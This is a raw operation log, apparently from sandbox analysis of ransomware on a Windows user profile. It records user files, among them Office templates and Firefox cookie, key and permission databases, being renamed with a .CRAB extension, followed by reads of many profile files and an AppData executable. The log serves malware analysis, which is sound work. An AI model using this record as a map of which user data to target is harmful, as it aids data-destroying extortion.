Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835231[[fn=Text Cover with TOC (Student Report Blue design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835231[[fn=Text Cover with TOC (Student Report Blue design)]].docx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835232[[fn=Text Cover (Student Report Blue design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835232[[fn=Text Cover (Student Report Blue design)]].docx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835264[[fn=Cover Page (Annual Report Red and Black design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835264[[fn=Cover Page (Annual Report Red and Black design)]].docx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835265[[fn=Cover Page (Annual Report Timeless design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835265[[fn=Cover Page (Annual Report Timeless design)]].docx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835266[[fn=Cover Letter (Chronological Resume Simple design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835266[[fn=Cover Letter (Chronological Resume Simple design)]].docx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835267[[fn=Cover with Logo (Annual Report Red and Black design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835267[[fn=Cover with Logo (Annual Report Red and Black design)]].docx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835268[[fn=Photo Cover (Student Report Blue design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835268[[fn=Photo Cover (Student Report Blue design)]].docx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835269[[fn=Photo Cover with TOC (Student Report blue design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835269[[fn=Photo Cover with TOC (Student Report blue design)]].docx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835270[[fn=Photo Sidebar (Annual Report Red and Black design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835270[[fn=Photo Sidebar (Annual Report Red and Black design)]].docx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835271[[fn=Sample Table (Annual Report Red and Black design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835271[[fn=Sample Table (Annual Report Red and Black design)]].docx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835272[[fn=Sample Table (Annual Report Timeless design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835272[[fn=Sample Table (Annual Report Timeless design)]].docx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02836362[[fn=Cover letter (Resume Timeless Design)]].docx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02836362[[fn=Cover letter (Resume Timeless Design)]].docx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Normal.dotm.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Normal.dotm True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Welcome to Word.dotx.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Welcome to Word.dotx True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addons.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addons.json True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addonStartup.json.lz4.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addonStartup.json.lz4 True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\blocklist.xml.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\blocklist.xml True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cert8.db.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cert8.db True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\compatibility.ini.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\compatibility.ini True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\containers.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\containers.json True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\content-prefs.sqlite.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\content-prefs.sqlite True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cookies.sqlite.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cookies.sqlite True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651440860.2d520ad0-8005-4317-b4fd-571af846ed8d.new-profile.jsonlz4.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651440860.2d520ad0-8005-4317-b4fd-571af846ed8d.new-profile.jsonlz4 True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651441015.321b9820-ddf0-4472-8833-27c2104c93fa.main.jsonlz4.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651441015.321b9820-ddf0-4472-8833-27c2104c93fa.main.jsonlz4 True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651456011.5f95b583-d699-497d-975d-4dba64e21259.main.jsonlz4.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651456011.5f95b583-d699-497d-975d-4dba64e21259.main.jsonlz4 True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\session-state.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\session-state.json True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\state.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\state.json True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\extensions.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\extensions.json True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\favicons.sqlite.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\favicons.sqlite True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\gmpopenh264.info.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\gmpopenh264.info True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\manifest.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\manifest.json True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\handlers.json.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\handlers.json True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\key3.db.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\key3.db True 1
Move C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\permissions.sqlite.CRAB source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\permissions.sqlite True 1
Read C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe size = 285192, size_out = 285192 True 1
Read - size = 4096, size_out = 101 True 1
Read C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\$IPEWI8I.TMP size = 1048576, size_out = 150 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\27YjI_tg_wmDvK-.gif size = 1048576, size_out = 2530 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\2KxNzGrrl.doc size = 1048576, size_out = 76537 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\57VfXi.wav size = 1048576, size_out = 27784 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\7y338WW30Khw_Kvdj.bmp size = 1048576, size_out = 94389 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\80nauBl1bcqQ.mp3 size = 1048576, size_out = 2043 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\9HQb6.gif size = 1048576, size_out = 34322 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\aD456ynae.png size = 1048576, size_out = 31408 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata size = 1048576, size_out = 7870 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl size = 1048576, size_out = 637 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl size = 1048576, size_out = 425 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_Acrobat12_Reader_3980e2e3-09b5-4737-a657-22675b06a39a_03db394c-1477-45d1-895c-00e42db7e723_0.rdy size = 1048576, size_out = 23372 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg size = 1048576, size_out = 216 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Adobe\Sonar\Sonar1.0\sonar_policy.xml size = 1048576, size_out = 18761 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\BC4CK.mp3 size = 1048576, size_out = 51502 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Cx 2hVTJNEPKc.mp3 size = 1048576, size_out = 38961 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\d 3OIHehyy3Jgx.mp4 size = 1048576, size_out = 89217 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Dz28gHwyj9-jVurMnBQV.ots size = 1048576, size_out = 99521 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\fezrNJYET8dXBnLxa.mp4 size = 1048576, size_out = 29747 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\FKoQ.odt size = 1048576, size_out = 86607 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\gfLne6ecA1jmfG6m8.mkv size = 1048576, size_out = 89244 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Im-Xi-TXJUjXU8gwjeAN.avi size = 1048576, size_out = 52416 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\iVmnctwjmS.swf size = 1048576, size_out = 100297 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\je8O8Wzi8buOk7-5Nx6.m4a size = 1048576, size_out = 8071 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\KdoskM.avi size = 1048576, size_out = 5554 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol size = 1048576, size_out = 506 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl size = 1048576, size_out = 333602 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL size = 1048576, size_out = 297017 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL size = 1048576, size_out = 268670 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL size = 1048576, size_out = 256358 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\GostTitle.XSL size = 1048576, size_out = 251449 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\HarvardAnglia2008OfficeOnline.xsl size = 1048576, size_out = 284802 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\IEEE2006OfficeOnline.xsl size = 1048576, size_out = 294525 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690.XSL size = 1048576, size_out = 270642 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\ISO690Nmerical.XSL size = 1048576, size_out = 217578 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl size = 1048576, size_out = 255219 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\SIST02.XSL size = 1048576, size_out = 251336 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\TURABIAN.XSL size = 1048576, size_out = 344662 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx size = 1048576, size_out = 1048576 True 3
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\Built-In Building Blocks.dotx size = 1048576, size_out = 560327 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\MSO1033.acl size = 1048576, size_out = 37730 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\con2.LNK size = 1048576, size_out = 282 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\index.dat size = 1048576, size_out = 63 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK size = 1048576, size_out = 1183 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.srs size = 1048576, size_out = 2560 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\Outlook.xml size = 1048576, size_out = 2346 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml size = 1048576, size_out = 168 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Cashflow analysis.xltm size = 1048576, size_out = 380006 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx size = 1048576, size_out = 1048576 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02836342[[fn=Ion]].thmx size = 1048576, size_out = 776190 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02892315[[fn=Wisp]].thmx size = 1048576, size_out = 787354 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900688[[fn=Facet]].thmx size = 1048576, size_out = 738429 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM02900771[[fn=Slice]].thmx size = 1048576, size_out = 864810 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090430[[fn=Banded]].thmx size = 1048576, size_out = 562113 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx size = 1048576, size_out = 1048576 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03090434[[fn=Wood Type]].thmx size = 1048576, size_out = 601009 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457444[[fn=Basis]].thmx size = 1048576, size_out = 558035 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457464[[fn=Dividend]].thmx size = 1048576, size_out = 570901 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457475[[fn=Frame]].thmx size = 1048576, size_out = 523048 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx size = 1048576, size_out = 1048576 True 2
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457485[[fn=Mesh]].thmx size = 1048576, size_out = 980900 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx size = 1048576, size_out = 777647 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx size = 1048576, size_out = 924687 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx size = 1048576, size_out = 966946 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx size = 1048576, size_out = 1048576 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx size = 1048576, size_out = 155473 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx size = 1048576, size_out = 486596 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx size = 1048576, size_out = 976001 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx size = 1048576, size_out = 1048576 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx size = 1048576, size_out = 415058 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx size = 1048576, size_out = 1048576 True 2
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx size = 1048576, size_out = 121791 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx size = 1048576, size_out = 1048576 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx size = 1048576, size_out = 702219 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx size = 1048576, size_out = 1048576 True 2
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx size = 1048576, size_out = 827085 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx size = 1048576, size_out = 1048576 True 2
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx size = 1048576, size_out = 259899 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx size = 1048576, size_out = 1048576 True 3
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx size = 1048576, size_out = 465596 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001103[[fn=Headlines]].thmx size = 1048576, size_out = 539609 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001104[[fn=Feathered]].thmx size = 1048576, size_out = 1048576 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001104[[fn=Feathered]].thmx size = 1048576, size_out = 1004500 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001105[[fn=Crop]].thmx size = 1048576, size_out = 536604 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx size = 1048576, size_out = 1048576 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx size = 1048576, size_out = 42909 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx size = 1048576, size_out = 608122 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM16401371[[fn=Atlas]].thmx size = 1048576, size_out = 857650 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox size = 1048576, size_out = 5783 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox size = 1048576, size_out = 4026 True 1
Read C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox size = 1048576, size_out = 4243 True 1
